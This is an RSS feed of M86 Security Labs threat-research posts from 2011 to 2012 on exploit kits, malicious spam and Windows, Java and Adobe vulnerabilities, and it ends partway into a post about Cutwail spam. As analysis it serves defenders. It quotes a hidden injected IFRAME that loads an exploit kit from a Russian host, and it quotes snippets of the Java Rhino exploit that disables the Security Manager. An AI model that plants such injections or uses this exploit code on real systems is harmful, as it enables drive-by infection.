<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>M86 Security Labs Blog</title>
	<atom:link href="http://labs.m86security.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://labs.m86security.com</link>
	<description>M86 Security Labs blog for all news related to security.</description>
	<lastBuildDate>Tue, 31 Jan 2012 16:45:18 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.1.3</generator>
		<item>
		<title>MIDI Files – Mid-Way to Infection</title>
		<link>http://labs.m86security.com/2012/01/midi-files-mid-way-to-infection/</link>
		<comments>http://labs.m86security.com/2012/01/midi-files-mid-way-to-infection/#comments</comments>
		<pubDate>01.31.12</pubDate>
		<dc:creator>Arseny Levin</dc:creator>
				<category><![CDATA[Vulnerabilities]]></category>
		<category><![CDATA[CVE-2012-0003]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[MIDI]]></category>
		<category><![CDATA[MS12-004]]></category>
		<category><![CDATA[Windows Media]]></category>

		<guid isPermaLink="false">http://labs.m86security.com/?p=4335</guid>
		<description><![CDATA[Microsoft’s January patch MS12-004 addressed a few vulnerabilities in Windows Media components. One particular issue, CVE-2012-0003, can be exploited via Windows Media Player ActiveX, as it leverages a heap overflow occurring in ‘midiOutPlayNextPolyEvent’ function within the Windows Multimedia Library, winmm.dll. The bad guys didn’t waste time and this vulnerability is now exploited in the wild as [...]]]></description>
			<content:encoded><![CDATA[<p>Microsoft’s January patch <a href="http://technet.microsoft.com/en-us/security/bulletin/ms12-004" target="_blank">MS12-004</a> addressed a few vulnerabilities in Windows Media components. One particular issue, CVE-2012-0003, can be exploited via Windows Media Player ActiveX, as it leverages a heap overflow occurring in ‘midiOutPlayNextPolyEvent’ function within the Windows Multimedia Library, winmm.dll. The bad guys didn’t waste time and this vulnerability is now exploited in the wild as reported by <a href="http://blog.trendmicro.com/malware-leveraging-midi-remote-code-execution-vulnerability-found/">Trend Micro</a>. A Web page hosted on a South Korean site loads a maliciously crafted <a href="http://www.midi.org/techspecs/midispec.php" target="_blank">MIDI</a> file and sprays the heap. The attacker utilizes the exploitation method presented in Nicolas Joly’s <a href="http://www.vupen.com/blog/20120117.Advanced_Exploitation_of_Windows_MS12-004_CVE-2012-0003.php" target="_blank">blog</a> from VUPEN. The attack allocates an HTML element of a specific size and eventually overwrites some of its data, and thus achieves malicious code execution.</p>
<p><a href="http://labs.m86security.com/wp-content/uploads/2012/01/cve-2012-0003.js.source.sneakpeakpng.png"><img class="aligncenter size-full wp-image-4338" title="cve-2012-0003.js.source.sneakpeakpng" src="http://labs.m86security.com/wp-content/uploads/2012/01/cve-2012-0003.js.source.sneakpeakpng.png" alt="" width="537" height="146" /></a></p>
<p>The author of this page used a Korean JavaScript obfuscator in order to obfuscate a large block of code which hides the shellcode, as can be seen in the following code snippet. In particular, the obfuscated code, generated by this tool, changes itself several times during execution.</p>
<p><a href="http://labs.m86security.com/wp-content/uploads/2012/01/cve-2012-0003.js.source.sneakpeakpng.png"></a><a href="http://labs.m86security.com/wp-content/uploads/2012/01/Dadongs.JSXX_.0.41.png"><img class="aligncenter size-full wp-image-4339" title="Dadongs.JSXX.0.41" src="http://labs.m86security.com/wp-content/uploads/2012/01/Dadongs.JSXX_.0.41.png" alt="" width="490" height="320" /></a><br />
The code also ensures that it is being executed only in Internet Explorer because that’s the only browser where this exploitation will be successful. After de-obfuscating the JavaScript code, we can analyze the shellcode itself. The author uses a common evading technique: XOR encryption, with a decrypting loop at the prologue. This technique is usually very effective against signature based detection engines.</p>
<p><a href="http://labs.m86security.com/wp-content/uploads/2012/01/decrypting.loop_.png"><img class="aligncenter size-full wp-image-4340" title="decrypting.loop" src="http://labs.m86security.com/wp-content/uploads/2012/01/decrypting.loop_.png" alt="" width="487" height="470" /></a></p>
<p>Then the shellcode imports and calls URLDownloadToFileA to download the payload which is a packed executable, saving it with an ambiguous name such as “a.exe”.</p>
<p><a href="http://labs.m86security.com/wp-content/uploads/2012/01/Shellcode21.png"><img class="aligncenter size-full wp-image-4341" title="Shellcode21" src="http://labs.m86security.com/wp-content/uploads/2012/01/Shellcode21.png" alt="" width="457" height="90" /></a></p>
<p>The executable is a downloader which fetches additional malware with rootkit capabilities. The author of the attack did a decent job obfuscating the executable file, as can be seen by a Virustotal analysis:</p>
<p><a href="http://labs.m86security.com/wp-content/uploads/2012/01/8ce40747ecf4c9e66b29a83f6e6426a9.png"><img class="aligncenter size-large wp-image-4342" title="8ce40747ecf4c9e66b29a83f6e6426a9" src="http://labs.m86security.com/wp-content/uploads/2012/01/8ce40747ecf4c9e66b29a83f6e6426a9-1024x747.png" alt="" width="450" height="328" /></a></p>
<p>All M86 Secure Web Gateway customers are protected from this attack by default without need to install any security update.</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.m86security.com/2012/01/midi-files-mid-way-to-infection/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Massive Compromise of WordPress-based Sites but ‘Everything will be Fine’</title>
		<link>http://labs.m86security.com/2012/01/massive-compromise-of-wordpress-based-sites-but-%e2%80%98everything-will-be-fine%e2%80%99/</link>
		<comments>http://labs.m86security.com/2012/01/massive-compromise-of-wordpress-based-sites-but-%e2%80%98everything-will-be-fine%e2%80%99/#comments</comments>
		<pubDate>01.30.12</pubDate>
		<dc:creator>Daniel Chechik</dc:creator>
				<category><![CDATA[Cybercrime]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[compromised websites]]></category>
		<category><![CDATA[Java Rhino]]></category>
		<category><![CDATA[Phoenix exploit kit 3.0]]></category>
		<category><![CDATA[Phoenix Exploit Kit source code]]></category>
		<category><![CDATA[Wordpress]]></category>

		<guid isPermaLink="false">http://labs.m86security.com/?p=4299</guid>
		<description><![CDATA[A few days ago, hundreds of websites, based on WordPress 3.2.1, were compromised. The attacker uploaded an HTML page to the standard Uploads folder and that page redirects the user to the Phoenix Exploit Kit. Its logs show that users from at least four hundred compromised sites were redirected to Phoenix exploit pages.  Here is [...]]]></description>
			<content:encoded><![CDATA[<div class="mceTemp mceIEcenter">
<div style="text-align: left;">A few days ago, hundreds of websites, based on WordPress 3.2.1, were compromised. The attacker uploaded an HTML page to the standard Uploads folder and that page redirects the user to the Phoenix Exploit Kit. Its logs show that users from at least four hundred compromised sites were redirected to Phoenix exploit pages.  Here is a partial list of those websites:</div>
<dl id="attachment_4302" class="wp-caption aligncenter" style="width: 300px;">
<dt class="wp-caption-dt"><a href="http://labs.m86security.com/wp-content/uploads/2012/01/links.png"><img class="size-full wp-image-4302 " title="Partial List of Compromised WordPress websites" src="http://labs.m86security.com/wp-content/uploads/2012/01/links.png" alt="Partial List of Compromised WordPress websites" width="290" height="391" /></a></dt>
<dd class="wp-caption-dd">Partial list of compromised WordPress websites</dd>
</dl>
<div class="MsoNormal" style="text-align: left; margin: 0in 0in 10pt;">The content uploaded by the attacker is not part of the home page and will not show when users browse  these websites. In fact, accessing any page on these compromised WordPress sites, other than the uploaded page, will not infect the user’s machine. The general motivation of attackers to compromise websites is mainly to bypass URL reputation mechanisms, spam filters and certain security policies.<br />
In order to lure users to these pages, the attacker sent thousands of malicious emails querying an unfamiliar bill and asking recipients to click on a link as described by Websense <a title="link" href="http://community.websense.com/blogs/securitylabs/archive/2012/01/26/phoenix-phoenix-i-need-help.aspx">blog</a>. The link points to the aforementioned uploaded page.</span></span><span style="font-size: small;"><span style="font-family: Calibri;"> </span></span></div>
<div id="attachment_4303" class="wp-caption aligncenter" style="width: 460px"><a href="http://labs.m86security.com/wp-content/uploads/2012/01/injected_code.png"><img class="size-large wp-image-4303 " title="The malicious uploaded page" src="http://labs.m86security.com/wp-content/uploads/2012/01/injected_code-1024x427.png" alt="The malicious uploaded page" width="450" height="187" /></a><p class="wp-caption-text">The malicious uploaded page</p></div>
<div style="text-align: left;">The page is obfuscated and adds a hidden IFRAME that leads to the Phoenix Exploit Kit:</div>
<table border="1" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td width="590" valign="top">
<div style="text-align: left;">&lt;IFRAME style=&#8221;RIGHT: -8710px; WIDTH: 0px; POSITION: fixed; HEIGHT: 24px&#8221; src=&#8221;hxxp://horoshovsebudet.ru:8801/html/yveveqduclirb1.php&#8221; frameborder=&#8221;0&#8243;&gt;&lt;/IFRAME&gt;</div>
</td>
</tr>
</tbody>
</table>
<p style="text-align: left;">The exploit page is hosted in a Russian domain called horoshovsebudet which roughly translates as “Everything will be fine”, showing a certain sense of humor by these attackers.<br />
The Phoenix Exploit Kit identifies the User Agent of the client machine and delivers a customized exploit Web page. The following obfuscated page was served when accessing with Internet Explorer 6:</p>
<div style="text-align: left;">
<div id="attachment_4314" class="wp-caption aligncenter" style="width: 460px"><a href="http://labs.m86security.com/wp-content/uploads/2012/01/phoenix_code1.png"><img class="size-large wp-image-4314" title="The obfuscated Phoenix exploit page" src="http://labs.m86security.com/wp-content/uploads/2012/01/phoenix_code1-1024x444.png" alt="The obfuscated Phoenix exploit page" width="450" height="195" /></a><p class="wp-caption-text">The obfuscated Phoenix exploit page</p></div>
</div>
<div style="text-align: left;">
<p>The obfuscated page above generates code which attempts exploiting multiple vulnerabilities in Microsoft Internet Explorer, Adobe PDF, Flash and Oracle Java as described in the <a href="http://labs.m86security.com/2011/06/phoenix-exploit-kit-2-7-continues-to-be-updated/">Phoenix Exploit Kit blog</a>. Among those exploits is the latest <a href="http://labs.m86security.com/2011/12/prevalent-exploit-kits-updated-with-a-new-java-exploit/">Java Rhino vulnerability</a> as shown in the following screenshot and taken from the original malicious server.</p>
</div>
<div id="attachment_4305" class="wp-caption aligncenter" style="width: 534px"><a href="http://labs.m86security.com/wp-content/uploads/2012/01/phoenix1.png"><img class="size-full wp-image-4305 " title="Statistics on Phoenix Exploit Kit control panel " src="http://labs.m86security.com/wp-content/uploads/2012/01/phoenix1.png" alt="Statistics on Phoenix Exploit Kit control panel " width="524" height="259" /></a><p class="wp-caption-text">Statistics on Phoenix Exploit Kit control panel </p></div>
<div style="text-align: left;">
<p>Note the successful exploitation rate of the Java Rhino vulnerability and of the PDF Libtiff vulnerability.  Even the MDAC vulnerability is successfully exploited which is surprising given that it only exists in the old version 6 of Internet Explorer.</p>
<p>Interestingly enough, the “Browser statistics” chart in the screen shot above shows that none of the victims used Google Chrome. Taking a closer look at the source code of the Phoenix Exploit Kit reveals that Chrome browser is explicitly excluded, for no obvious reason:</p>
</div>
<div class="mceTemp mceIEcenter" style="text-align: left;">
<dl id="attachment_4306" class="wp-caption aligncenter" style="width: 463px;">
<dt class="wp-caption-dt"><a href="http://labs.m86security.com/wp-content/uploads/2012/01/source_code.png"><img class="size-full wp-image-4306  " title="Phoenix Exploit Kit source code" src="http://labs.m86security.com/wp-content/uploads/2012/01/source_code.png" alt="Phoenix Exploit Kit source code" width="453" height="270" /></a></dt>
<dd class="wp-caption-dd">Phoenix Exploit Kit source code</dd>
</dl>
</div>
<div class="mceTemp mceIEcenter">
<div style="text-align: left;">
<p>All M86 Secure Web Gateway customers are protected against this attack by default. The access to the exploit page is blocked.</p>
<p>As usual, stay safe and be careful not to click links in suspicious emails.</p>
</div>
</div>
</div>
]]></content:encoded>
			<wfw:commentRss>http://labs.m86security.com/2012/01/massive-compromise-of-wordpress-based-sites-but-%e2%80%98everything-will-be-fine%e2%80%99/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Zbot Trojan spreads through fake ConEdison billing notification email</title>
		<link>http://labs.m86security.com/2012/01/zbot-trojan-spreads-through-fake-conedison-billing-notification-email/</link>
		<comments>http://labs.m86security.com/2012/01/zbot-trojan-spreads-through-fake-conedison-billing-notification-email/#comments</comments>
		<pubDate>01.13.12</pubDate>
		<dc:creator>Rodel Mendrez</dc:creator>
				<category><![CDATA[Spam]]></category>

		<guid isPermaLink="false">http://labs.m86security.com/?p=4276</guid>
		<description><![CDATA[Today we came across a new malicious spam campaign that is actively sent out by the Cutwail spam botnet. The suspicious email claims to be a bill summary from the New York-based energy company Con Edison, Inc. It may use the subject line &#8220;ConEdison Billing Summary as of &#60;DATE&#62;&#8221; and the attachment uses the filename format [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: left;">Today we came across a new malicious spam campaign that is actively sent out by the Cutwail spam botnet. The suspicious email claims to be a bill summary from the New York-based energy company Con Edison, Inc. It may use the subject line &#8220;<em>ConEdison Billing Summary as of &lt;DATE&gt;</em>&#8221; and the attachment uses the filename format  <em>Billing-Summary-ConEdison-&lt;random numbers&gt;-&lt;Date&gt;.zip.</em></p>
<p style="text-align: center;"><a href="http://labs.m86security.com/wp-content/uploads/2012/01/EmailScreenShot.png"><img class="aligncenter size-full wp-image-4277" title="Fake ConEdison Bill notification email" src="http://labs.m86security.com/wp-content/uploads/2012/01/EmailScreenShot.png" alt="" width="769" height="542" /></a></p>
<p style="text-align: left;">The attached zip file contains an executable file, which unsurprisingly is a <a href="https://www.virustotal.com/file/6eee51705f34b6cfc7f0c872a7949ec3e3172a908303baf5d67d03b98f70e7e3/analysis/">Zbot malware</a> variant. When extracted, the malicious executable uses no disguise. It uses no fake icons of Adobe Reader or Microsft Word, no double file extensions, or excessive use of space in the file name to hide the .EXE extension. The attached file is so dull that average users should easily spot that the file is suspicious.</p>
<p style="text-align: left;"><a href="http://labs.m86security.com/wp-content/uploads/2012/01/ZipAttached.png"><img class="aligncenter size-full wp-image-4279" title="Zbot Attached" src="http://labs.m86security.com/wp-content/uploads/2012/01/ZipAttached.png" alt="" width="420" height="339" /></a></p>
<p style="text-align: left;">The good news is that when this particular Zbot sample was run, it failed to communicate to its command and control (CnC) server at<em> plantlunch[dot]ru</em> which turns out to be <a href="https://zeustracker.abuse.ch/monitor.php?host=plantlunch.ru&amp;id=5d24056d985d594f25b955348d9c4a60">currently offline</a>.</p>
<p style="text-align: left;"><a href="http://labs.m86security.com/wp-content/uploads/2012/01/NoResponse.png"><img class="aligncenter size-full wp-image-4280" src="http://labs.m86security.com/wp-content/uploads/2012/01/NoResponse.png" alt="" width="820" height="69" /></a></p>
<p style="text-align: left;">&nbsp;</p>
<p style="text-align: left;">In conclusion, bill notifications do not usually arrive with an executable file so emails like this should be treated with extreme suspicion. When you see these obvious signs of malware, just stop and delete the email. M86 MailMarshal customers were protected against this campaign from the moment it began.</p>
<p style="text-align: left;">&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.m86security.com/2012/01/zbot-trojan-spreads-through-fake-conedison-billing-notification-email/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Web Hijacks with AJAX</title>
		<link>http://labs.m86security.com/2012/01/web-hijacks-with-ajax/</link>
		<comments>http://labs.m86security.com/2012/01/web-hijacks-with-ajax/#comments</comments>
		<pubDate>01.03.12</pubDate>
		<dc:creator>Moshe Basanchig</dc:creator>
				<category><![CDATA[Malware]]></category>

		<guid isPermaLink="false">http://labs.m86security.com/?p=4257</guid>
		<description><![CDATA[Malware authors always seem to closely monitor trends in Web security development in order to create a variety of browser-based attacks. Just to name a few, techniques such as code obfuscation, plug-in detection and affiliate management are often used. This is why we, at M86 Security, weren&#8217;t surprised to see a malicious site which loads [...]]]></description>
			<content:encoded><![CDATA[<p>Malware authors always seem to closely monitor trends in Web security development in order to create a variety of browser-based attacks. Just to name a few, techniques such as code obfuscation, plug-in detection and affiliate management are often used.</p>
<p>This is why we, at M86 Security, weren&#8217;t surprised to see a malicious site which loads parts of its attack using AJAX (Asynchronous JavaScript and XML), a method for client-side code to asynchronously exchange data with web servers. The following attack was observed on a currently running server located in China, which is serving malware. So how does this work?</p>
<p>First, there&#8217;s a web-page, containing JavaScript code that fetches the other parts of the attack:</p>
<p><a href="http://labs.m86security.com/wp-content/uploads/2012/01/loader.png"><img class="alignnone size-medium wp-image-4259" title="loader function" src="http://labs.m86security.com/wp-content/uploads/2012/01/loader-300x221.png" alt="loader function" width="300" height="221" /></a></p>
<p>This code is very similar to code commonly used in so many web pages nowadays. The main difference is the extra parameters it accepts, which are used to &#8220;cut&#8221; certain parts from the accepted content, so it could be processed and executed as code later on.</p>
<p>Next, the returned code is used by the exploit. In this case, the code is shellcode:</p>
<p><a href="http://labs.m86security.com/wp-content/uploads/2012/01/shellcode.png"><img class="alignnone size-medium wp-image-4260" title="shellcode" src="http://labs.m86security.com/wp-content/uploads/2012/01/shellcode-300x168.png" alt="shellcode" width="300" height="168" /></a></p>
<p>It&#8217;s simple. Using the exact same technique, this web page can load various browser or plugin exploit attempts. In this specific case, the page loads a SWF file exploiting CVE-2010-1297. Other pages on this server are exploiting CVE-2010-0806 and CVE-2010-0249.</p>
<p>The main reason that malware authors use AJAX is the ability to write generic attack pages which look benign and become malicious only once the dynamic content is loaded. This provides an advantage which is also very useful for evading AV detection, since tiny bits of the attack can be loaded one at a time, thus making it very difficult to provide a signature.</p>
<p>Needless to say, M86 SWG customers are protected from such exploitation attempts.</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.m86security.com/2012/01/web-hijacks-with-ajax/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Prevalent Exploit Kits Updated with a New Java Exploit</title>
		<link>http://labs.m86security.com/2011/12/prevalent-exploit-kits-updated-with-a-new-java-exploit/</link>
		<comments>http://labs.m86security.com/2011/12/prevalent-exploit-kits-updated-with-a-new-java-exploit/#comments</comments>
		<pubDate>12.16.11</pubDate>
		<dc:creator>Daniel Chechik</dc:creator>
				<category><![CDATA[Cybercrime]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Vulnerabilities]]></category>
		<category><![CDATA[Blackhole exploit kit 1.2.1]]></category>
		<category><![CDATA[Blackhole1.2.1]]></category>
		<category><![CDATA[CVE-2011-3544]]></category>
		<category><![CDATA[Java]]></category>
		<category><![CDATA[Phoenix 3.0]]></category>
		<category><![CDATA[Phoenix exploit kit 3.0]]></category>

		<guid isPermaLink="false">http://labs.m86security.com/?p=4213</guid>
		<description><![CDATA[Until recently, most of the vulnerabilities exploited by popular exploit kits were found last year or even earlier. Moreover, it would take authors at least a month to update their kits with the new exploits that had been discovered in the wild. However, in the past few weeks, authors released an updated version of their [...]]]></description>
			<content:encoded><![CDATA[<div class="mceTemp mceIEcenter" style="text-align: left;">
<p style="mso-line-height-alt: 11.9pt;"><span style="font-family: &quot;Calibri&quot;,&quot;sans-serif&quot;; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"><span style="font-size: small;">Until recently, most of the vulnerabilities exploited by popular exploit kits were found last year or even earlier. Moreover, it would take authors at least a month to update their kits with the new exploits that had been discovered in the wild. However, in the past few weeks, authors released an updated version of their kits with a new recent exploit before a patch had been released.</span></span></p>
<p style="mso-line-height-alt: 11.9pt;"><span style="font-family: &quot;Calibri&quot;,&quot;sans-serif&quot;; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"><span style="font-size: small;">First, a new version of the Blackhole exploit kit was released, version 1.2.1:</span></span></p>
</div>
<div class="mceTemp mceIEcenter" style="text-align: left;">
<dl id="attachment_4215" class="wp-caption aligncenter" style="width: 494px;">
<dt class="wp-caption-dt"><a href="http://labs.m86security.com/wp-content/uploads/2011/12/blackhole12.png"><img class="size-full wp-image-4215 " title="Live Blackhole Exploit Kit control panel" src="http://labs.m86security.com/wp-content/uploads/2011/12/blackhole12.png" alt="Live Blackhole Exploit Kit control panel" width="484" height="404" /></a></dt>
<dd class="wp-caption-dd">Live Blackhole Exploit Kit control panel</dd>
</dl>
</div>
<div class="mceTemp mceIEcenter" style="text-align: left;">
<p style="mso-line-height-alt: 11.9pt;"><span style="font-family: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"><span style="font-size: small;">The Blackhole exploit kit presented above was modified to exploit clients that have Java installed, using the recently discovered CVE-2011-3544 vulnerability. This is the only vulnerability that is actually being exploited.<br />
A few days later, a new version of Phoenix exploit kit 3.0 was released,  just a few weeks after the release of its predecessor, Phoenix 2.9.</span></span></p>
</div>
<div id="attachment_4217" class="wp-caption aligncenter" style="width: 491px"><a href="http://labs.m86security.com/wp-content/uploads/2011/12/phoenix121.png"><img class="size-full wp-image-4217 " title="Live Phoenix Exploit Kit 3.0 control panel" src="http://labs.m86security.com/wp-content/uploads/2011/12/phoenix121.png" alt="Live Phoenix Exploit Kit 3.0 control panel" width="481" height="271" /></a><p class="wp-caption-text">Live Phoenix Exploit Kit 3.0 control panel</p></div>
<p style="mso-line-height-alt: 11.9pt;"><span style="font-family: &quot;Calibri&quot;,&quot;sans-serif&quot;; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"><span style="font-size: small;">Notice the red boxes in the screen shots above: A new exploit was added to those exploit kits, which is the reason for the upgrade.</span></span></p>
<p style="mso-line-height-alt: 11.9pt;"><span style="font-family: &quot;Calibri&quot;,&quot;sans-serif&quot;; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"><span style="font-size: small;">A few weeks ago Michael ‘mihi’ Schierl </span><a href="http://schierlm.users.sourceforge.net/CVE-2011-3544.html"><span style="color: #800080; font-size: small;">described a design error in Java.</span></a><span style="font-size: small;"> Basically this vulnerability is similar to other Java vulnerabilities where an untrusted code is executed in elevated privileges. Rhino is a Javascript engine that runs under the JVM and can interact with Java applets. An attacker can bypass the scripting engine protection by generating an error object, using Rhino script, which runs in elevated privileges and executing code that disables the Security Manager. Once the Security Manager is disabled, the attacker can execute code with full permissions.</span></span></p>
<p style="mso-line-height-alt: 11.9pt;"><span style="font-family: &quot;Calibri&quot;,&quot;sans-serif&quot;; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"><span style="font-size: small;">Not long after the discovery, an exploit module was published in </span><a href="https://metasploit.com/svn/framework3/trunk/external/source/exploits/CVE-2011-3544/Exploit.java"><span style="font-size: small;">Metasploit</span></a><span style="font-size: small;">. First, the code binds a Rhino object with the applet:</span></span></p>
<table border="1" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td style="text-align: left;" width="590" valign="top">import javax.script.*;<br />
…<br />
ScriptEngine engine = new ScriptEngineManager().getEngineByName(&#8220;js&#8221;);<br />
Bindings b = engine.createBindings();<br />
b.put(&#8220;applet&#8221;, this);</td>
</tr>
</tbody>
</table>
<p style="mso-line-height-alt: 11.9pt;"><span style="font-family: &quot;Calibri&quot;,&quot;sans-serif&quot;; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"><span style="font-size: small;">The Java code executes a script that bypasses the Security Manager protection by using the “toString” method inside a script context:</span></span></p>
<table border="1" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td style="text-align: left;" width="590" valign="top">Object proxy = (Object) engine.eval(<br />
&#8220;this.toString = function() {&#8221; +<br />
&#8220;                      java.lang.System.setSecurityManager(null);&#8221; +<br />
&#8220;                      applet.callBack();&#8221; +<br />
&#8220;                      return String.fromCharCode(97 + Math.round(Math.random() * 25));&#8221;+<br />
&#8220;};&#8221; +<br />
&#8220;e = new Error();&#8221; +<br />
&#8220;e.message = this;&#8221; +<br />
&#8220;e&#8221;, b);</td>
</tr>
</tbody>
</table>
<p style="mso-line-height-alt: 11.9pt;"><span style="font-family: &quot;Calibri&quot;,&quot;sans-serif&quot;; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"><span style="font-size: small;">The script throws an exception, and the rest of the code would be executed.</span></span></p>
<table border="1" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td style="text-align: left;" width="590" valign="top">catch (ScriptException e) {<br />
e.printStackTrace();<br />
}</td>
</tr>
</tbody>
</table>
<p><span style="font-family: &quot;Calibri&quot;,&quot;sans-serif&quot;; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"><span style="font-size: small;">The vulnerability is cross-platform and doesn’t require heap spray or buffer overflow techniques. That makes it very effective and therefore authors of exploit kits rushed to add it to their kits. The concerning aspect is that the Blackhole exploit kit was updated even before a patch was released by the vendor.</span></span></p>
<p style="text-align: left;"><span style="font-family: &quot;Calibri&quot;,&quot;sans-serif&quot;; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"><span style="font-size: small;">Customers of all versions of M86 Secure Web Gateway are safe, as it provides zero-day protection against this vulnerability by default.</span></span></p>
<p style="text-align: left;"><span style="font-family: &quot;Calibri&quot;,&quot;sans-serif&quot;; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"><span style="font-size: small;">We highly encourage users to keep their Java updated, or remove it if it is not needed. A patch for this Java vulnerability is available by now: Look for Java 6 Update 29, or Java 7 Update 1.</span></span></p>
]]></content:encoded>
			<wfw:commentRss>http://labs.m86security.com/2011/12/prevalent-exploit-kits-updated-with-a-new-java-exploit/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>A new Adobe 0-day In the Wild – – But No Worries, You are Already Protected with Our Secure Web Gateway!</title>
		<link>http://labs.m86security.com/2011/12/a-new-adobe-0-day-in-the-wild-%e2%80%93-%e2%80%93-but-no-worries-you-are-already-protected-with-our-secure-web-gateway/</link>
		<comments>http://labs.m86security.com/2011/12/a-new-adobe-0-day-in-the-wild-%e2%80%93-%e2%80%93-but-no-worries-you-are-already-protected-with-our-secure-web-gateway/#comments</comments>
		<pubDate>12.07.11</pubDate>
		<dc:creator>Anat Davidi</dc:creator>
				<category><![CDATA[Vulnerabilities]]></category>
		<category><![CDATA[0day]]></category>
		<category><![CDATA[Acrobat Reader]]></category>
		<category><![CDATA[Adobe]]></category>
		<category><![CDATA[CVE-2011-2462]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[PDF]]></category>
		<category><![CDATA[SWG]]></category>

		<guid isPermaLink="false">http://labs.m86security.com/?p=4205</guid>
		<description><![CDATA[Yesterday Adobe released an advisory for a vulnerability in the Adobe Reader and Adobe Acrobat products. The vulnerability, titled &#8216;U3D Memory Corruption Vulnerability&#8217; was part of a targeted attack and discovered by Lockheed Martin&#8217;s Computer Incident Response Team. This is not the first time a targeted attack has been aimed at the US defense industry. [...]]]></description>
			<content:encoded><![CDATA[<p>Yesterday Adobe released an <a href="https://www.adobe.com/support/security/advisories/apsa11-04.html" target="_blank">advisory</a> for a vulnerability in the Adobe Reader and Adobe Acrobat products.  The vulnerability, titled &#8216;U3D Memory Corruption Vulnerability&#8217; was part of a targeted attack and discovered by Lockheed Martin&#8217;s Computer Incident Response Team.  This is not the first time a targeted attack has been aimed at the US defense industry. </p>
<p>This attack involves embedding a maliciously crafted Universal 3D (U3D) stream in a PDF file, one of several examples of attacks on embedded streams within PDF files, and represents a growing attack vector due to its ability to deal with defense mechanisms among which <a href="http://msdn.microsoft.com/en-us/library/windows/desktop/aa366553(v=vs.85).aspx" target="_blank">DEP</a> and <a href="http://msdn.microsoft.com/en-us/library/bb430720.aspx" target="_blank">ASLR</a> (two techniques meant to help prevent unauthorized code execution) using known techniques such as JIT Spraying.</p>
<p>According to Adobe&#8217;s <a href="http://blogs.adobe.com/asset/2011/12/background-on-cve-2011-2462.html" target="_blank">blog post</a> released alongside the advisory, Adobe is planning to release an update for Adobe Reader 9, the version targeted by this vulnerability, &#8220;no later than the week of December 12, 2011&#8243;. The rest of its supported versions will receive updates as part of their quarterly updates in January 2012.</p>
<p>M86 Secure Web Gateway, version 9.2 and above, provides zero-day protection against this attack, without requiring any further updates. Customers who wish to monitor the attack in their organization may look for attacks that are tagged with the “Adobe Universal 3D streams” block message. </p>
<p>We’re proud that our proactive rules block this new zero-day exploit and we’ll continue to work hard to provide this level of protection to our customers in the future.</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.m86security.com/2011/12/a-new-adobe-0-day-in-the-wild-%e2%80%93-%e2%80%93-but-no-worries-you-are-already-protected-with-our-secure-web-gateway/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Cutwail Spam Campaigns Lure Users to Blackhole Exploit Kit</title>
		<link>http://labs.m86security.com/2011/12/cutwail-spam-campaigns-lure-users-to-blackhole-exploit-kit/</link>
		<comments>http://labs.m86security.com/2011/12/cutwail-spam-campaigns-lure-users-to-blackhole-exploit-kit/#comments</comments>
		<pubDate>12.01.11</pubDate>
		<dc:creator>Rodel Mendrez</dc:creator>
				<category><![CDATA[Spam]]></category>

		<guid isPermaLink="false">http://labs.m86security.com/?p=4176</guid>
		<description><![CDATA[Over the past few days the Cutwail botnet has been sending out malicious spam campaigns with a variety of themes such as airline ticket orders, Automated Clearing House (ACH), Facebook notification, and scanned document. These campaigns do not have malware attachments, instead the payload is delivered via links to malicious code hosted on the web. [...]]]></description>
			<content:encoded><![CDATA[<p>Over the past few days the <a href="http://www.m86security.com/labs/spambotitem.asp?article=900">Cutwail</a> botnet has been sending out malicious spam campaigns with a variety of themes such as <em>airline ticket orders</em>, <em>Automated Clearing House (ACH)</em>, <em>Facebook notification</em>, and <em>scanned document</em>. These campaigns do not have malware attachments, instead the payload is delivered via links to malicious code hosted on the web.</p>
<p>The subject lines used in the Facebook spam campaign are similar to those in the image below. Notice that they use varying letter case and random Facebook profile names.</p>
